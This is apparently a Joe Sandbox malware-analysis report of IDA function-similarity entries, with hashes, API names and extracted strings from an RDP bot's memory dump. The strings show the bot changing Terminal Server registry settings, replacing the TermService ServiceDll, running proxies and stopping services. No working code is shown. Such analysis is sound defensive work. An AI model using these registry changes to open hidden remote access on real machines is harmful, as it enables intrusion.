                                    • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                    • API String ID: 1332880857-2775769510
                                    • Opcode ID: 3f9e11fcc17abf5ba9f096b44ca0ba3e785fb52bbfba26a764cf6a5b363ed596
                                    • Instruction ID: fce820499f1450b12a325b67ae39f63e6dd01a420e700075aed3d6a1227395f3
                                    • Opcode Fuzzy Hash: 3f9e11fcc17abf5ba9f096b44ca0ba3e785fb52bbfba26a764cf6a5b363ed596
                                    • Instruction Fuzzy Hash: 57B14DE2B0D5C692FA268764EC613F822A1AB83358F150136D54EC76B0DEFCED85D302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                    • API String ID: 1879646588-710610406
                                    • Opcode ID: 4273e8831345663ac9c1a7c465d2f287409f5200574b241b5aa6345e2d2d4d7d
                                    • Instruction ID: 5106209b90dd0b31eab475f41076a2bc7bd091afb9ee866901c99bd85720bd9b
                                    • Opcode Fuzzy Hash: 4273e8831345663ac9c1a7c465d2f287409f5200574b241b5aa6345e2d2d4d7d
                                    • Instruction Fuzzy Hash: 568129E2F4D59382FB225635EC902B866909F067D4F164032DD6ED72B49EECAD858383
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                    • API String ID: 1799206407-3397184676
                                    • Opcode ID: 4821548b992a156d0be7b06a1d048e5a7c5903372e16c3e866e8ee0a102dd9eb
                                    • Instruction ID: 64f3baa949627cfe3b20123cf96fd9659c252634c516ff6a9316cc4142acc7f6
                                    • Opcode Fuzzy Hash: 4821548b992a156d0be7b06a1d048e5a7c5903372e16c3e866e8ee0a102dd9eb
                                    • Instruction Fuzzy Hash: DF510CE1F0C6A781FA265B25EC403B863606F067A5F554132CA5E866B1FEEDAD85C302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$Openstrcat
                                    • String ID: %Program$=$DP\$Files%\R$PortNumber$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$dontdisplaylastusername$fDenyTSConnections$fSingleSessionPerUser
                                    • API String ID: 3837987249-370723470
                                    • Opcode ID: 3609afca0902705998d8a7cda26a767b05c7a04b401a1f5521b35f1bf207de1c
                                    • Instruction ID: 497450dae7d4eef4a03696bdb93df4502480996f631798162151e1f208113b16
                                    • Opcode Fuzzy Hash: 3609afca0902705998d8a7cda26a767b05c7a04b401a1f5521b35f1bf207de1c
                                    • Instruction Fuzzy Hash: E9416EB160C7C284FB219B21FC013A57664EB4A794F844235EA9C877E9DFBCD604CB49
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastMetricsSystem$fflushfwrite
                                    • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$C:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                    • API String ID: 144387239-450147120
                                    • Opcode ID: 0c792507c01524b729b0f643efde5a87c41b26f24cceda20fbc26d6f7b70ed1f
                                    • Instruction ID: 7450628a65d4341f392bb5575e597570151945073c8ffb55b2534c8abb48409c
                                    • Opcode Fuzzy Hash: 0c792507c01524b729b0f643efde5a87c41b26f24cceda20fbc26d6f7b70ed1f
                                    • Instruction Fuzzy Hash: E8711BD5F0D5C785FB266E74EC507782251AB17748F50203AE50ECA2B4DEECAD859703
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseCreate
                                    • String ID: (key != NULL)$(root != NULL)$?$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                    • API String ID: 2932200918-3746808683
                                    • Opcode ID: e09ce5def54cdbc52debb7ec7cccdf14546772f3e65c2a30113c9dc4adf42bd7
                                    • Instruction ID: 45db557d3d2ffbb29aa6bcdaeb9c3dc304aaedcaebd12d745b4155f76c1acd33
                                    • Opcode Fuzzy Hash: e09ce5def54cdbc52debb7ec7cccdf14546772f3e65c2a30113c9dc4adf42bd7
                                    • Instruction Fuzzy Hash: 11512DE2F0C5D381FA228734EC403B96260AB0A794F490136D99DD76B4DEFDAD85C782
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateErrorHandleLastTime
                                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                    • API String ID: 2291555494-3647951244
                                    • Opcode ID: 37eb7d84cb5e8611ba4e5f8fae9de8031ce1b8bf1324ec1b5fecabb4903a95c5
                                    • Instruction ID: 284fd48b74609843f8550e35758c4ed6d1ef19b38cdb998d4730ab53f71f70d9
                                    • Opcode Fuzzy Hash: 37eb7d84cb5e8611ba4e5f8fae9de8031ce1b8bf1324ec1b5fecabb4903a95c5
                                    • Instruction Fuzzy Hash: D3513CE1F0D29382FA324A30DC453B862A0AB42768F194635D91DDF2F0DEACAC4487D2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$EnvironmentExpandStringsstrcpy
                                    • String ID: %ProgramFiles%\RDP\$l$termsrv3$ts32*.dl$v32.ini
                                    • API String ID: 1745783570-2116699108
                                    • Opcode ID: c41eb2f5244f37d4435c0b4e09606931c24a4718de27b2a50ba76fbc60d5d844
                                    • Instruction ID: 1c3ecc2b9372e9cedf7819370876885cd30a86feb0d5f7938a5a33314454569f
                                    • Opcode Fuzzy Hash: c41eb2f5244f37d4435c0b4e09606931c24a4718de27b2a50ba76fbc60d5d844
                                    • Instruction Fuzzy Hash: 8D4162A270C7C291FB229B25E8503FA6251EB4A744F544031EB4D87BA6DEBCDE05C746
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                    • API String ID: 2918714741-1670302297
                                    • Opcode ID: 393ef079ece544c21ea446ec4ece21935be9cb976ea0c479da9d52f71e1e7923
                                    • Instruction ID: da87ec3e8cedf1fa0f2578f8189cb440e992fbc60d2e018a3944a25557a1b771
                                    • Opcode Fuzzy Hash: 393ef079ece544c21ea446ec4ece21935be9cb976ea0c479da9d52f71e1e7923
                                    • Instruction Fuzzy Hash: 4A216DB1B0C68696F6229F25ED407AA7660AB46784F44403AFE4C87674CFBCED85C701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                                    • String ID: [I] (%s) -> Proxy closed(id=%llx)$[W] (%s) -> Proxy not exists(id=%llx)$proxy_close
                                    • API String ID: 4048354325-2870541463
                                    • Opcode ID: 712f95854910f3e8e0aade919d4cd818beb71a9e247dbf8dfd635eaa8ce684fc
                                    • Instruction ID: a4327123e8a74a069d10e09c723a44dc954efcb2be4894848cb04a0fc21acc93
                                    • Opcode Fuzzy Hash: 712f95854910f3e8e0aade919d4cd818beb71a9e247dbf8dfd635eaa8ce684fc
                                    • Instruction Fuzzy Hash: B42129A1A1EA8781FF629B35DC5117862A0AF4BB60B184635DD3DC63F4DEACAC55C301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 2595137571-638458398
                                    • Opcode ID: 3ed2d8b9dbf78e8626dcf1075f9c91aa1287d97e58c272b56c27b9d342335e32
                                    • Instruction ID: 952efb64cc6c934511eb668ccae1a80ff518c22587e70679942ae371e567ffa9
                                    • Opcode Fuzzy Hash: 3ed2d8b9dbf78e8626dcf1075f9c91aa1287d97e58c272b56c27b9d342335e32
                                    • Instruction Fuzzy Hash: 091116E1B1CA8391FA629B75EC4427A52A1BF06B85F845435CD5E8B3B4DEBCAC588301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 2595137571-638458398
                                    • Opcode ID: 61ebda7c9a75cf6fd9379b58ca17d24c0a1ebf727755d359657486beb170ab25
                                    • Instruction ID: be2b856da70fa1f310c03b6b0175c5ed4ee8d939bf9f0f171a750a092ca6cf2b
                                    • Opcode Fuzzy Hash: 61ebda7c9a75cf6fd9379b58ca17d24c0a1ebf727755d359657486beb170ab25
                                    • Instruction Fuzzy Hash: 181128E1B1CA8391FA239B75EC4427A52A1BF06B85F845435CD1ECB3B4DEBCAD548202
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 2595137571-638458398
                                    • Opcode ID: 996f495a909f0bd638c5968cd08873662b4cd7a46a3c34c1dc8f18ebb8e5f026
                                    • Instruction ID: 8774d0dd524a8fe8b1583fc3f52a71bbd56ce5ae82f17ffafec1b4b09a4eb300
                                    • Opcode Fuzzy Hash: 996f495a909f0bd638c5968cd08873662b4cd7a46a3c34c1dc8f18ebb8e5f026
                                    • Instruction Fuzzy Hash: E81128E1B1CA8391FA239B75EC4427A52A1BF06B85F845435CD1ECB3B5DEBCAC548201
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 2595137571-638458398
                                    • Opcode ID: 7f36150ea4f059692cd9818045931b5a18d33b806f31f38deac785743fa1adc3
                                    • Instruction ID: 8cfeba07babc5e3603ef1b6f60e3f8b7b53a9b5319c95bdbe6656408ccb3f031
                                    • Opcode Fuzzy Hash: 7f36150ea4f059692cd9818045931b5a18d33b806f31f38deac785743fa1adc3
                                    • Instruction Fuzzy Hash: 061128E1B1CA8391FA239B75EC4427A52A1BF06B85F845435CD1ECB3B4DEBCAC548201
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                    • API String ID: 384173800-4041758303
                                    • Opcode ID: c1c060f186eb342436fb734f2fbcc4792ec157808e5673767c41785e04e2db50
                                    • Instruction ID: 13bf3132d64ff6fb734622ddc47119c770a1cfb4f14ace8ba38c71b2447970c7
                                    • Opcode Fuzzy Hash: c1c060f186eb342436fb734f2fbcc4792ec157808e5673767c41785e04e2db50
                                    • Instruction Fuzzy Hash: 3BF01DA0E1EA8790FD03D731FC5147477B4AF1AB80B400532DC4D8A370EEACA955C300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CopyErrorFileLastfflushfwrite
                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                    • API String ID: 2887799713-3464183404
                                    • Opcode ID: cd6b9d1f01bb8824239211b2dace7a9b5a9fafed83674eeede46243d8d0c5ff7
                                    • Instruction ID: 93d2ef75186060a93b05964888b72a9fec2f8695f1772a64d0762bc73cbaf8e7
                                    • Opcode Fuzzy Hash: cd6b9d1f01bb8824239211b2dace7a9b5a9fafed83674eeede46243d8d0c5ff7
                                    • Instruction Fuzzy Hash: 78413DD1F0D6D781FB674A36EC043B966507F22B98F544132CD0E866B4DEEDAE818702
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
                                    • String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
                                    • API String ID: 2011334650-1527096901
                                    • Opcode ID: 7c2f03f4522ea7c54cac7d0198125063fdfde5b84ab23f79319d17b97361dceb
                                    • Instruction ID: bf89035b5a5d3d6beb6da4021a4935d3823bdf50f0d01a12662a7fe7e78934a5
                                    • Opcode Fuzzy Hash: 7c2f03f4522ea7c54cac7d0198125063fdfde5b84ab23f79319d17b97361dceb
                                    • Instruction Fuzzy Hash: 5F21DBE1B0E68751FF535B35ECA11B863A0AF56B80F484435C91D86375DEACAD85D302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcat
                                    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                    • API String ID: 2335785903-2423714266
                                    • Opcode ID: 886c1d0125082086d6236a7ee7ce3a2728db80c2a689adc5134ad21f3790033e
                                    • Instruction ID: b565e1927c06ee7785a30bcb69db859198f49756bceaa12f56d998b69f47d381
                                    • Opcode Fuzzy Hash: 886c1d0125082086d6236a7ee7ce3a2728db80c2a689adc5134ad21f3790033e
